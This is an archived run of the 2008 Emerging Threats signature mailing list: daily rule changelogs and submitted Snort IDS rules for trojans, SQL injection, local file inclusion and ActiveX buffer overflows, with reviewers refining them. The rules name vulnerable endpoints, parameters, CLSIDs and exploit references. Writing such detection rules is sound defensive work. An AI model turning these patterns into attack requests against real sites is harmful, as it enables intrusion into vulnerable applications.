ET TROJAN Zbot/Zeus HTTP POST 2008662 || ET TROJAN Generic PSW Agent server reply 2008663 || ET MALWARE Suspicious User-Agent Detected (aguarovex-loader v3.221) 2008664 || ET TROJAN Generic Dropper HTTP Bot grabbing config 2008665 || ET TROJAN Obfiscator.vc or Related Infection Checkin 2008666 || ET TROJAN Delf Key Checkin (Clicker.Win32.Delf.afl) 2008667 || ET TROJAN Backdoor.Win32.Agent.fvt Checkin 2008668 || ET WEB_SPECIFIC myEvent viewevent.php SQL Injection || url,www.milw0rm.com/exploits/6760 || bugtraq,31773 2008669 || ET WEB_SPECIFIC AstroSPACES profile.php SQL Injection || url,www.milw0rm.com/exploits/6758 || bugtraq,31771 2008670 || ET WEB_SPECIFIC SweetCMS page SQL Injection || url,packetstorm.linuxsecurity.com/0810-exploits/sweetcms-sql.txt || url,secunia.com/Advisories/32277/ 2008671 || ET WEB_SPECIFIC Sports Clubs Web Panel p Parameter Local File Inclusion || url,www.milw0rm.com/exploits/6427 || url,www.frsirt.com/english/advisories/2008/2550 2008672 || ET WEB_SPECIFIC My PHP Dating id parameter SQL Injection || url,www.milw0rm.com/exploits/6754 || url,secunia.com/advisories/32268 2008673 || ET EXPLOIT Microsoft PicturePusher ActiveX Cross Site File Upload Attack || url,milw0rm.com/exploits/6699 2008674 || ET TROJAN Likely eCard Malware Laden Email Inbound || url,www.sophos.com/blogs/gc/g/2008/10/15/you-have-not-received-an-ecard/ 2008675 || ET TROJAN Backdoor.Win32.Assasin.20.C Control Session Start 2008676 || ET TROJAN Backdoor.Win32.Assasin.20.C Control Session Server Reply 2008677 || ET TROJAN Backdoor.Win32.Assasin.20.C Control Channel Client Reply -> Added to emerging-virus.rules (8): #re c6f326609487aaae451366728ec5cdd9 #re 4bde1bc2f7b6d4e11b1a570aaa52df57 # ref: c2a3a87735f8c5e11de82c52c94aefc7 #by Veerendra at secpod #re 7a60eada62a331c793ba066e43bfc4f2 # ref: 5742862edc6fddd3f51bf9d07c8d7aba #by Paul Dokas # ref: 940fc0b0d523be104a96b09871e42b1e [---] Removed non-rule lines: [---] -> Removed from emerging-drop-BLOCK.rules (2): # VERSION 1323 # Generated 2008-10-11 00:03:02 EDT -> Removed from emerging-drop.rules (2): # VERSION 1323 # Generated 2008-10-11 00:03:02 EDT -> Removed from emerging-sid-msg.map (12): 2500061 || ET COMPROMISED Known Compromised or Hostile Host Traffic (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500062 || ET COMPROMISED Known Compromised or Hostile Host Traffic (63) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500063 || ET COMPROMISED Known Compromised or Hostile Host Traffic (64) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500064 || ET COMPROMISED Known Compromised or Hostile Host Traffic (65) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500065 || ET COMPROMISED Known Compromised or Hostile Host Traffic (66) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500066 || ET COMPROMISED Known Compromised or Hostile Host Traffic (67) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510061 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510062 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (63) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510063 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (64) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510064 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (65) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510065 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (66) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510066 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (67) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (12): 2500061 || ET COMPROMISED Known Compromised or Hostile Host Traffic (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500062 || ET COMPROMISED Known Compromised or Hostile Host Traffic (63) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500063 || ET COMPROMISED Known Compromised or Hostile Host Traffic (64) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500064 || ET COMPROMISED Known Compromised or Hostile Host Traffic (65) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500065 || ET COMPROMISED Known Compromised or Hostile Host Traffic (66) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500066 || ET COMPROMISED Known Compromised or Hostile Host Traffic (67) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510061 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510062 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (63) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510063 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (64) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510064 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (65) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510065 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (66) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510066 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (67) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From emerging at emergingthreats.net Sun Oct 19 16:00:07 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Sun, 19 Oct 2008 16:00:07 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081019200007.DEC4445026@goliath.jonkmans.com> [***] Results from Oinkmaster started Sun Oct 19 16:00:07 2008 [***] [*] Rules modifications: [*] None. [+++] Added non-rule lines: [+++] -> Added to emerging-sid-msg.map (2): 2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org 2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org -> Added to emerging-sid-msg.map.txt (2): 2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org 2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org From signatures at stillsecure.com Mon Oct 20 08:32:53 2008 From: signatures at stillsecure.com (signatures) Date: Mon, 20 Oct 2008 06:32:53 -0600 Subject: [Emerging-Sigs] StillSecure: 6 New Signatures - Oct-17-2008 References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2909@webmail.latis.com> <48F8D75F.6060502@jonkmans.com> Message-ID: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290B@webmail.latis.com> Hi Matt, We followed your leads based on that we can limit from "any" to HTTP ports. Please find updated signature below: Hummingbird HostExplorer ActiveX Control PlainTextPassword Buffer Overflow: alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( msg:"Hummingbird HostExplorer ActiveX Control PlainTextPassword Buffer Overflow"; flow:to_client,established; content:"CLSID"; nocase; content:"FFB6CC68-702D-4FE2-A8E7-4DE23835F0D2"; nocase; content:"PlainTextPassword"; nocase; classtype:web-application-attack; reference:url,www.milw0rm.com/exploits/6761; reference:bugtraq,31783; sid:8465; rev:2;) Thanks & Regards, StillSecure ________________________________ From: Matt Jonkman [mailto:jonkman at jonkmans.com] Sent: Fri 10/17/2008 12:20 PM To: signatures Cc: emerging-sigs at emergingthreats.net Subject: Re: [Emerging-Sigs] StillSecure: 6 New Signatures - Oct-17-2008 signatures wrote: > *4. **Hummingbird HostExplorer ActiveX Control PlainTextPassword > Buffer Overflow * > > alert tcp $EXTERNAL_NET any -> $HOME_NET any ( msg:"Hummingbird > HostExplorer ActiveX Control PlainTextPassword Buffer Overflow"; > flow:to_client,established; content:"CLSID"; nocase; > content:"FFB6CC68-702D-4FE2-A8E7-4DE23835F0D2"; nocase; > content:"PlainTextPassword"; nocase; classtype:successful-user; > reference:url,www.milw0rm.com/exploits/6761; reference:bugtraq,31783; > sid:8465; rev:1;) Can we port limit this any? Matt -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081020/ed4319a7/attachment.html From signatures at stillsecure.com Mon Oct 20 08:49:11 2008 From: signatures at stillsecure.com (signatures) Date: Mon, 20 Oct 2008 06:49:11 -0600 Subject: [Emerging-Sigs] StillSecure: 2 New Signatures - Oct-20-2008 Message-ID: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290C@webmail.latis.com> Hi Matt, Please find 2 new signatures: 1. Hummingbird Deployment Wizard 2008 ActiveX Insecure Methods alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( msg:"Hummingbird Deployment Wizard 2008 ActiveX Insecure Methods"; flow:to_client,established; content:"CLSID"; nocase; content:"7F9B30F1-5129-4F5C-A76C-CE264A6C7D10"; nocase; pcre:"/(Run|SetRegistryValueAsString|PerformUpdateAsync)/i"; classtype:web-application-attack; reference:url,secunia.com/Advisories/32337/; sid:8474; rev:1;) 2. CafeEngine id Remote SQL Injection alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"CafeEngine id Remote SQL Injection"; flow:established,to_server; content:"GET"; pcre:"/\/(dish.php|menu.php)/Ui";uricontent:"?id="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,secunia.com/advisories/32308/; reference:url,milw0rm.com/exploits/6762; sid:8475; rev:1;) Looking forward for your comments if any... Thanks & Regards, StillSecure -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081020/d7826bb8/attachment.html From jonkman at jonkmans.com Mon Oct 20 13:18:34 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Mon, 20 Oct 2008 13:18:34 -0400 Subject: [Emerging-Sigs] StillSecure: 2 New Signatures - Oct-20-2008 In-Reply-To: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290C@webmail.latis.com> References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290C@webmail.latis.com> Message-ID: <48FCBD6A.8020506@jonkmans.com> On the second one, we need a better content match before the pcre. Is there anything else we can use? If not the general sql injection sigs will do the trick. Posting the first one, thanks guys!! Matt signatures wrote: > Hi Matt, > > > > Please find 2 new signatures: > > > > *1.** **Hummingbird Deployment Wizard 2008 ActiveX Insecure Methods* > > alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( msg:"Hummingbird > Deployment Wizard 2008 ActiveX Insecure Methods"; > flow:to_client,established; content:"CLSID"; nocase; > content:"7F9B30F1-5129-4F5C-A76C-CE264A6C7D10"; nocase; > pcre:"/(Run|SetRegistryValueAsString|PerformUpdateAsync)/i"; > classtype:web-application-attack; > reference:url,secunia.com/Advisories/32337/; sid:8474; rev:1;) > > * * > > *2.** **CafeEngine id Remote SQL Injection* > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS > (msg:"CafeEngine id Remote SQL Injection"; flow:established,to_server; > content:"GET"; pcre:"/\/(dish.php|menu.php)/Ui";uricontent:"?id="; > nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:url,secunia.com/advisories/32308/; > reference:url,milw0rm.com/exploits/6762; sid:8475; rev:1;) > > > > Looking forward for your comments if any... > > > Thanks & Regards, > StillSecure > > > ------------------------------------------------------------------------ > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From frank at knobbe.us Mon Oct 20 14:00:26 2008 From: frank at knobbe.us (Frank Knobbe) Date: Mon, 20 Oct 2008 13:00:26 -0500 Subject: [Emerging-Sigs] StillSecure: 2 New Signatures - Oct-20-2008 In-Reply-To: <48FCBD6A.8020506@jonkmans.com> References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290C@webmail.latis.com> <48FCBD6A.8020506@jonkmans.com> Message-ID: <1224525626.42047.23.camel@localhost> On Mon, 2008-10-20 at 13:18 -0400, Matt Jonkman wrote: > On the second one, we need a better content match before the pcre. Is > there anything else we can use? If not the general sql injection sigs > will do the trick. Well, since it's only two choices in the pcre, why not break it into two rules with content match? -Frank -- It is said that the Internet is a public utility. As such, it is best compared to a sewer. A big, fat pipe with a bunch of crap sloshing against your ports. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 187 bytes Desc: This is a digitally signed message part Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081020/9c204193/attachment.bin From emerging at emergingthreats.net Mon Oct 20 16:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Mon, 20 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081020200008.4DC1F4502B@goliath.jonkmans.com> [***] Results from Oinkmaster started Mon Oct 20 16:00:08 2008 [***] [+++] Added rules: [+++] 2008678 - ET EXPLOIT Hummingbird Deployment Wizard 2008 ActiveX Insecure Methods (emerging-exploit.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-exploit.rules (1): #by stillsecure -> Added to emerging-sid-msg.map (1): 2008678 || ET EXPLOIT Hummingbird Deployment Wizard 2008 ActiveX Insecure Methods || url,secunia.com/Advisories/32337/ -> Added to emerging-sid-msg.map.txt (1): 2008678 || ET EXPLOIT Hummingbird Deployment Wizard 2008 ActiveX Insecure Methods || url,secunia.com/Advisories/32337/ From jonkman at jonkmans.com Tue Oct 21 10:42:49 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Tue, 21 Oct 2008 10:42:49 -0400 Subject: [Emerging-Sigs] First OISF Brainstorming Session Scheduled Message-ID: <48FDEA69.7090906@jonkmans.com> Our first in-person, up-close and personal Open Information Security Foundation Brainstorming Session is scheduled. I'll be at Deepsec in Vienna November 11-14. The first two days are training in which Victor Julien and I are doing a Protocol Analysis for Writing Snort Signatures class. (2 days, in depth, you should come!). Then we've got space in the general conference on the 13th and 14th for the Brainstorming Session. More on the schedule here: https://deepsec.net/schedule/ As you can see there are some great sessions there. Jose Nazario, Joe Stewart, Johnny Long, all the greats. This is definitely a conference to hit, and you can't beat Vienna for some good drinking with your history. Again, this is just the first of many sessions we're going to set up. If you're going to a conference you think we ought to be at please let us know. There are so many coming up we need to make sure we hit the right ones. Hope to see you there! -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jonkman at jonkmans.com Tue Oct 21 14:12:29 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Tue, 21 Oct 2008 14:12:29 -0400 Subject: [Emerging-Sigs] StillSecure: 2 New Signatures - Oct-20-2008 In-Reply-To: <1224525626.42047.23.camel@localhost> References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290C@webmail.latis.com> <48FCBD6A.8020506@jonkmans.com> <1224525626.42047.23.camel@localhost> Message-ID: <48FE1B8D.2020309@jonkmans.com> Yes, we definitely could. I'll do so. Matt Frank Knobbe wrote: > On Mon, 2008-10-20 at 13:18 -0400, Matt Jonkman wrote: >> On the second one, we need a better content match before the pcre. Is >> there anything else we can use? If not the general sql injection sigs >> will do the trick. > > Well, since it's only two choices in the pcre, why not break it into two > rules with content match? > > -Frank > -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From emerging at emergingthreats.net Tue Oct 21 16:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Tue, 21 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081021200008.39C2A45026@goliath.jonkmans.com> [***] Results from Oinkmaster started Tue Oct 21 16:00:08 2008 [***] [+++] Added rules: [+++] 2008679 - ET WEB_SPECIFIC CafeEngine id Remote SQL Injection (dish.php) (emerging-web_sql_injection.rules) 2008680 - ET WEB_SPECIFIC CafeEngine id Remote SQL Injection (menu.php) (emerging-web_sql_injection.rules) [///] Modified active rules: [///] 2008391 - ET MALWARE Suspicious User-Agent (svchost) (emerging-malware.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-sid-msg.map (4): 2008679 || ET WEB_SPECIFIC CafeEngine id Remote SQL Injection (dish.php) || url,milw0rm.com/exploits/6762 || url,secunia.com/advisories/32308/ 2008680 || ET WEB_SPECIFIC CafeEngine id Remote SQL Injection (menu.php) || url,milw0rm.com/exploits/6762 || url,secunia.com/advisories/32308/ 2500061 || ET COMPROMISED Known Compromised or Hostile Host Traffic (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510061 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Added to emerging-sid-msg.map.txt (4): 2008679 || ET WEB_SPECIFIC CafeEngine id Remote SQL Injection (dish.php) || url,milw0rm.com/exploits/6762 || url,secunia.com/advisories/32308/ 2008680 || ET WEB_SPECIFIC CafeEngine id Remote SQL Injection (menu.php) || url,milw0rm.com/exploits/6762 || url,secunia.com/advisories/32308/ 2500061 || ET COMPROMISED Known Compromised or Hostile Host Traffic (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510061 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (2): 2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org 2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org -> Removed from emerging-sid-msg.map.txt (2): 2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org 2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org From signatures at stillsecure.com Wed Oct 22 09:22:43 2008 From: signatures at stillsecure.com (signatures) Date: Wed, 22 Oct 2008 07:22:43 -0600 Subject: [Emerging-Sigs] StillSecure: 6 New Signatures - Oct-22-2008 Message-ID: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290D@webmail.latis.com> Hi Matt, Please find 6 new signatures 1. Dart Communications PowerTCP FTP for ActiveX DartFtp.dll Control Buffer Overflow alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( msg:"Dart Communications PowerTCP FTP for ActiveX DartFtp.dll Control Buffer Overflow"; flow:to_client,established; content:"CLSID"; nocase; content:"39FDA070-61BA-11D2-AD84-00105A17B608"; nocase; distance:0; content:"%5F%DC%02%10%cc"; nocase; distance:0; content:"SecretKey"; nocase; classtype:web-application-attack; reference:bugtraq,31814; reference:url,www.milw0rm.com/exploits/6793; sid:8479; rev:1;) 2. E-Shop Shopping Cart Script search_results.php SQL Injection alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"E-Shop Shopping Cart Script search_results.php SQL Injection"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/search_results.php?cid="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:bugtraq,30692; sid:8476; rev:1;) 3. Joomla DS-Syndicate Component feed_id SQL Injection alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Joomla DS-Syndicate Component feed_id SQL Injection"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/index2.php?option=ds-syndicate"; nocase; uricontent:"version=1"; nocase; uricontent:"feed_id="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,www.secunia.com/advisories/32321; reference:url,www.milw0rm.com/exploits/6792; sid:8478; rev:1;) 4. zeeproperty adid Parameter Remote SQL Injection alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"zeeproperty adid Parameter Remote SQL Injection"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/bannerclick.php?adid="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,secunia.com/Advisories/32333/; reference:url,milw0rm.com/exploits/6780; sid:8477; rev:1;) 5. PassWiki site_id Parameter Local File Inclusion alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"PassWiki site_id Parameter Local File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/passwiki.php?site_id="; nocase; pcre:"/(\.\.\/){1,}/U"; classtype:web-application-attack; reference:bugtraq,29455; sid:8480; rev:1;) 6. XOOPS Makale Module id SQL Injection alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"XOOPS Makale Module id SQL Injection"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/makale.php?id="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,secunia.com/advisories/32347/; reference:url,www.milw0rm.com/exploits/6795; sid:8481; rev:1;) Looking forward for your comments if any... Thanks & Regards, StillSecure -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081022/93c453ab/attachment.html From jonkman at jonkmans.com Wed Oct 22 15:16:37 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Wed, 22 Oct 2008 15:16:37 -0400 Subject: [Emerging-Sigs] StillSecure: 6 New Signatures - Oct-22-2008 In-Reply-To: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290D@webmail.latis.com> References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290D@webmail.latis.com> Message-ID: <48FF7C15.6030904@jonkmans.com> Lovely sigs! Thanks Posting them now. Matt signatures wrote: > Hi Matt, > > > > Please find 6 new signatures > > * * > > *1. **Dart Communications PowerTCP FTP for ActiveX DartFtp.dll > Control Buffer Overflow * > > alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( msg:"Dart > Communications PowerTCP FTP for ActiveX DartFtp.dll Control Buffer > Overflow"; flow:to_client,established; content:"CLSID"; nocase; > content:"39FDA070-61BA-11D2-AD84-00105A17B608"; nocase; distance:0; > content:"%5F%DC%02%10%cc"; nocase; distance:0; content:"SecretKey"; > nocase; classtype:web-application-attack; reference:bugtraq,31814; > reference:url,www.milw0rm.com/exploits/6793; sid:8479; rev:1;) > > * * > > *2. **E-Shop Shopping Cart Script search_results.php SQL Injection * > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"E-Shop > Shopping Cart Script search_results.php SQL Injection"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/search_results.php?cid="; nocase; pcre:"/UNION.+SELECT/Ui"; > classtype:web-application-attack; reference:bugtraq,30692; sid:8476; rev:1;) > > > > *3. **Joomla DS-Syndicate Component feed_id SQL Injection * > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Joomla > DS-Syndicate Component feed_id SQL Injection"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/index2.php?option=ds-syndicate"; nocase; > uricontent:"version=1"; nocase; uricontent:"feed_id="; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:url,www.secunia.com/advisories/32321; > reference:url,www.milw0rm.com/exploits/6792; sid:8478; rev:1;) > > > > *4. **zeeproperty adid Parameter Remote SQL Injection * > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS > (msg:"zeeproperty adid Parameter Remote SQL Injection"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/bannerclick.php?adid="; nocase; pcre:"/UNION.+SELECT/Ui"; > classtype:web-application-attack; > reference:url,secunia.com/Advisories/32333/; > reference:url,milw0rm.com/exploits/6780; sid:8477; rev:1;) > > > > *5. **PassWiki site_id Parameter Local File Inclusion * > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"PassWiki > site_id Parameter Local File Inclusion"; flow:to_server,established; > content:"GET "; depth:4; uricontent:"/passwiki.php?site_id="; nocase; > pcre:"/(\.\.\/){1,}/U"; classtype:web-application-attack; > reference:bugtraq,29455; sid:8480; rev:1;) > > > > *6. **XOOPS Makale Module id SQL Injection* > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"XOOPS > Makale Module id SQL Injection"; flow:to_server,established; > content:"GET "; depth:4; uricontent:"/makale.php?id="; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:url,secunia.com/advisories/32347/; > reference:url,www.milw0rm.com/exploits/6795; sid:8481; rev:1;) > > > > Looking forward for your comments if any... > > > > Thanks & Regards, > StillSecure > > > ------------------------------------------------------------------------ > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From emerging at emergingthreats.net Wed Oct 22 16:00:07 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Wed, 22 Oct 2008 16:00:07 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081022200007.DCD5F45026@goliath.jonkmans.com> [***] Results from Oinkmaster started Wed Oct 22 16:00:07 2008 [***] [+++] Added rules: [+++] 2008681 - ET MALWARE iframebiz - /qwertyuiyw12ertyuytre/adv***.php (emerging-malware.rules) 2008682 - ET TROJAN Trojan.Zonebac.D (emerging-virus.rules) 2008683 - ET EXPLOIT Dart Communications PowerTCP FTP for ActiveX DartFtp.dll Control Buffer Overflow (emerging-exploit.rules) 2008684 - ET WEB_SPECIFIC E-Shop Shopping Cart Script search_results.php SQL Injection (emerging-web_sql_injection.rules) 2008685 - ET WEB_SPECIFIC Joomla DS-Syndicate Component feed_id SQL Injection (emerging-web_sql_injection.rules) 2008686 - ET WEB_SPECIFIC zeeproperty adid Parameter Remote SQL Injection (emerging-web_sql_injection.rules) 2008687 - ET WEB PassWiki site_id Parameter Local File Inclusion (emerging-web.rules) 2008688 - ET WEB_SPECIFIC XOOPS Makale Module id SQL Injection (emerging-web_sql_injection.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-malware.rules (1): #by Deapesh Misra -> Added to emerging-sid-msg.map (8): 2008681 || ET MALWARE iframebiz - /qwertyuiyw12ertyuytre/adv***.php || www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_DLOADR.QC&VSect=T || url,iframecash.biz 2008682 || ET TROJAN Trojan.Zonebac.D 2008683 || ET EXPLOIT Dart Communications PowerTCP FTP for ActiveX DartFtp.dll Control Buffer Overflow || url,www.milw0rm.com/exploits/6793 || bugtraq,31814 2008684 || ET WEB_SPECIFIC E-Shop Shopping Cart Script search_results.php SQL Injection || bugtraq,30692 2008685 || ET WEB_SPECIFIC Joomla DS-Syndicate Component feed_id SQL Injection || url,www.milw0rm.com/exploits/6792 || url,www.secunia.com/advisories/32321 2008686 || ET WEB_SPECIFIC zeeproperty adid Parameter Remote SQL Injection || url,milw0rm.com/exploits/6780 || url,secunia.com/Advisories/32333/ 2008687 || ET WEB PassWiki site_id Parameter Local File Inclusion || bugtraq,29455 2008688 || ET WEB_SPECIFIC XOOPS Makale Module id SQL Injection || url,www.milw0rm.com/exploits/6795 || url,secunia.com/advisories/32347/ -> Added to emerging-sid-msg.map.txt (8): 2008681 || ET MALWARE iframebiz - /qwertyuiyw12ertyuytre/adv***.php || www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_DLOADR.QC&VSect=T || url,iframecash.biz 2008682 || ET TROJAN Trojan.Zonebac.D 2008683 || ET EXPLOIT Dart Communications PowerTCP FTP for ActiveX DartFtp.dll Control Buffer Overflow || url,www.milw0rm.com/exploits/6793 || bugtraq,31814 2008684 || ET WEB_SPECIFIC E-Shop Shopping Cart Script search_results.php SQL Injection || bugtraq,30692 2008685 || ET WEB_SPECIFIC Joomla DS-Syndicate Component feed_id SQL Injection || url,www.milw0rm.com/exploits/6792 || url,www.secunia.com/advisories/32321 2008686 || ET WEB_SPECIFIC zeeproperty adid Parameter Remote SQL Injection || url,milw0rm.com/exploits/6780 || url,secunia.com/Advisories/32333/ 2008687 || ET WEB PassWiki site_id Parameter Local File Inclusion || bugtraq,29455 2008688 || ET WEB_SPECIFIC XOOPS Makale Module id SQL Injection || url,www.milw0rm.com/exploits/6795 || url,secunia.com/advisories/32347/ -> Added to emerging-virus.rules (1): #ref 483dbf6dd97ec249b0ec84a358e39260 -> Added to emerging-web.rules (1): #by Stillsecure -> Added to emerging-web_sql_injection.rules (1): #by stillsecure [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (2): 2500061 || ET COMPROMISED 